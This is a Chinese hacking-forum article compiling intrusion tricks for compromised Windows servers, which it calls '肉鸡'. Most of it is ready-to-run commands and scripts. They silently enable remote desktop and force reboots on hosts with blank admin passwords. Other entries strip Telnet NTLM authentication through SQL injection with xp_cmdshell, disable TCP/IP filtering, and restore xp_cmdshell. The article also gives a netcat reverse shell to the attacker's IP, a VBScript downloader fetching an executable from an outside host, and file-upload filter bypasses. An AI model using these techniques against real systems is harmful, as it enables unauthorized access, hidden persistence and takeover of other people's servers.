您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

入侵过程中小技巧总结

2007-11-8 10:30| 投稿: security

摘要: 查看3389端口总结 一、导出注册表法 regedit /e tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Ter...
查看3389端口总结 一、导出注册表法 regedit /e tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" 然后 type tsport.reg | find "PortNumber" 结果如果是d3d的话就证明是3389端口 如果是其他的 转换成10进制就可以了。 二、脚本利用法 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScript.Shell") Dim TSName,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo("终端端口为"&TSName) WScript.Echo() WScript.Echo("本程序是帮助你找到终端的端口") WScript.Echo("http://Www.HackPixy.Com&qu... WScript.Echo("Pixy") 把以上代码保存为vbs文件,如“3389port.vbs” 然后在命令行下运行cscript 3389port.vbs 即可查看终端端口(桌面环境下可直接点击查看)。 三、ASP实现法 sub get_terminal_port() terminal_port_path="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" terminal_port_key="PortNumber" termport=wsh.regread(terminal_port_path&terminal_port_key) if termport="" or err.number<>0 then response.write "无法得到终端服务端口。请检查权限是否已经受到限制。<br>" else response.write "当前终端服务端口: "&termport&"<br>" end if end sub 四、利用工具 C3389.exe ========================================================= 开启XP And 2003终端的方法 xp、2003开终端的方法和2000、nt(ts version)不一样,不是通过安装,因为xp、2003已经自动安装的远程桌面功能,只是启动不启动的问题。 通过下面这个批处理就能在命令行下激活xp、2003的远程桌面功能 echo windows registry editor version 5.00>>3389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server]>>3389.reg echo "fdenytsconnections"=dword:00000000>>3389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp]>>3389.reg echo "portnumber"=dword:00000d3d>>3389.reg echo [hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp]>>3389.reg echo "portnumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg ========================================================= 修改3389端口方法(修改后不易被扫出) 修改服务器端的端口设置,注册表有2个地方需要修改 [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp] PortNumber值,默认是3389,修改成所希望的端口,比如6000 第二个地方: [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]  PortNumber值,默认是3389,修改成所希望的端口,比如6000 现在这样就可以了。重启系统就可以了. ============================================================== 打开3389端口的5种方法 怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用: 1,打开记事本,编辑内容如下: echo [Components] > c:\sql echo TSEnable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 使用方法: 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如: c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 服务端口: 设置终端服务的服务端口。默认是3389。 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。 使用/fr表示强制重起目标。(如果/r不行,可以试试这个) 使用此参数时,端口设置不能忽略。 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空 运行CMD(2000下的DOS),我们给它开终端! 命令如下! cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启) 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。 因为pro版不能安装终端服务。 如果你确信脚本判断错误,就继续安装好了。 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。 3,下载3389自动安装程序-djshao正式版5.0 说明: 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务! 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版! 5,下载DameWare NT Utilities 3.66.0.0 注册版 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。 复制启动后出现对方桌面。 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK ============================================================== 终端服务器超出了最大允许连接数的解决办法 1、首先你可以telnet到此主机上(不管你用哪种方法),当然如果能直接操作机器更好,不过直接操作就不必用命令行了,用控制台更直观,这里不是我们讲述的问题,略过。 2、Telnet上去后,先看登陆的用户: 输入命令:query user 系统返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator console   0 运行中 . 2004-10-09 15:37 user1 UserMachine1   1 运行中 . 2004-10-09 15:37 user2                 12 已断开 无 2004-10-09 15:37 此时可以看出的可能根我们的不一样,根据具体情况而定。 看到吗? ID 0 的用户是本地登陆的,ID 1 和 ID 12是3389登陆的用户,前者在运行中,后者已经断开了,但是断开了仍然占用系统资源和通道,我们要把它踢掉。如下进行操作即可。 输入命令:logoff 12 C:\>query user //再看看 USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator console 0 运行中 . 2004-10-09 15:37 user1 UserMachine1   1 运行中 . 2004-10-09 15:37 3、如果服务器关闭了telnet功能(这是默认的),还可以通过SqlServer的xp_cmdshell扩展存储过程,使用格式:master.dbo.xp_cmdshell '命令内容',其余可参考第二步。此方式要求有访问xp_cmdshell的权限。 mstsc /console /v:IP:终端端口    T管理 ============================================================== 对于Telnet的HTLM身份验证的突破方法总结 By:独孤依人[SST] 对于Telnet的HTLM身份验证的突破方法常用以下四种方法: 1、新建用户法 telnet对方ip,发现需要 NTLM 身份验证。我们在自己的电脑里建立一个要登录的远程帐号和密码都相同的身份为管理员的账户。 找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入刚才新建的帐号和密码,telnet对方ip,直接可以登陆对方电脑了。 这种方法我以前常用的,实用性较强 2、命令法 那就是直接运行命令:tlntadmn config sec = -ntlm 注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'-- 运行以后就去掉了该死的ntlm认证:) 3、上传ntml.exe法 这种方法有很多缺点,比如:对方有杀毒软件,网段屏蔽了TFTP等等. 4、telnet配置信息写入法 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。 对于Telnet的HTLM身份验证的突破方法用1或2中方法就可解决! ============================================================== 解除TCP/IP筛选 的方法总结 TCP/IP筛选在注册表里有三处,分别是: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip 分别用 regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip 命令来导出注册表项 然后把 三个文件里的EnableSecurityFilters"=dword:00000001,改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可 附: 解除TCP/IP限制的小技巧 作者:河马史诗  http://www.wrsky.com 1.用NC反弹得到一个shell 本机监听 NC -l -p 32 WEBSHELL运行: x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port" 得到一个shell 2.CMD下导出注册表文件 C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser vices\Tcpip C:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip C:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip 修改各文件 EnableSecurityFilters 处 将最后的1改为0 3.将注册表文件导入 x:\xxx>regedit -s 1.reg x:\xxx>regedit -s 2.reg x:\xxx>regedit -s 3.reg -S 为无提示 重启命令 iisreset /reboot 完成TCP/IP筛选限制 ============================================================ xp_cmdshell新的恢复办法 xp_cmdshell新的恢复办法 扩展储存过程被删除以后可以有很简单的办法恢复: 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 恢复 dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ----------------------------- 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 否则上传xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll' 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshel ============================================================= 文件上传方法汇总 文件上传是很早以前的事了,最早那会常用的就是IPC连接,然后一个一个的COPY,自从动网upfile漏洞出来以后,各种脚本系统如PHP.JSP下的文件漏洞纷纷暴出,原理都是大同小异,没有过滤文件上传路径,导致可以抓包然后把空格20改成00,变成空字符NULL,系统是从右往左识别的,所以到空字符那就截断了,更简单的就是过滤文件上传类型不完整,改后缀就可以解决了,这些上传文件的漏洞,用万能上传工具就可以轻松搞定,不过漏洞文件名不同罢了。 还有一些另类的文件上传方法,是在系统做了比较好的防范下完成的,资料来源感谢CD-LION提供一。 先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊. copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已复制一个文件 启动它 d:\downloads\winzip32\winshell.exe 浏览器窗口会停好久, 不用等的,程序已经启动了,点停止,接着, 断开共享连接: net use \\myIP\c$ /del 完成 1利用telnet上传文件 by :jiangyf@usa.net 如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢? 方法很简单: 1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子: begin 644 file.bat M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT<E!>4%]J M95@T85!9+7@M04%28#!@*CTP,'500D])04%!049+04]"4$E$34-"04Q%04I- M3D-"2D%,24%!14U-3D-"1D5'24=&0T%%3D="1T1(0T=02$='2DA#2$9(1$-! M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@ M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@`` ` end sum -r/size 17903/262 全部都是可见的ASCII字符了 2.用TELNET连接到主机后输入 $ cat >a  然后用WINODWS的拷贝/粘贴,把文件粘贴到telnet窗口 按^d 在当前目录下产生文件a 3.uudecode a 文件复原,然后chmod即可 3脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用 echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序 实例的简化: echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs echo xPost.Open "GET","http://167168.meibu.com/sr...,0 >>167168.vbs echo xPost.Send() >>167168.vbs echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs echo sGet.Mode = 3 >>167168.vbs echo sGet.Type = 1 >>167168.vbs echo sGet.Open() >>167168.vbs echo sGet.Write(xPost.responseBody) >>167168.vbs echo sGet.SaveToFile "srv.exe",2 >>167168.vbs 然后执行cscript 167168.vbs就可以啦.其中,http://167168.meibu.com/sr...改成你放 文件的网站路径,srv.exe可以改成保存文件的路径。 4.start its:http://167168.meibu.com/ca... (看清楚,小心论坛自动加的标签) cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" (假设系统装在c盘,且当前环境是SYSTEM。如果是用户环境,修改Default User为该用户名) dir /s ca[1].rar 然后会显示ca[1].rar的具体位置,比如C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5QMVC11H\ca[1].rar 最后: copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar del 0QMVC11H\ca[1].rar 还有可以用EXE2BAT转换成批处理,再上传,这种方法只限于小文件,文件太长粘贴时会出错,传个NC做反向连接是不错的选择。 最近我还遇见一种校友录系统,只有注册后再能上传照片(SESSION),我注册后发现可以上传任意文件,可是只能解析图片类型的后缀,这种情况应该是在服务端又加了一层JSP认正,如果用本地提交可以绕过JSP认正,可是没有登陆,第一层SESSION验证就不会通过了,上传思路是把ASP文件改成JPG后缀上传,然后抓包,这里的数据包已经包含SESSION值了,再修改后缀为ASP,用NC提交,原理就是这样,具体测试在进行中..

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部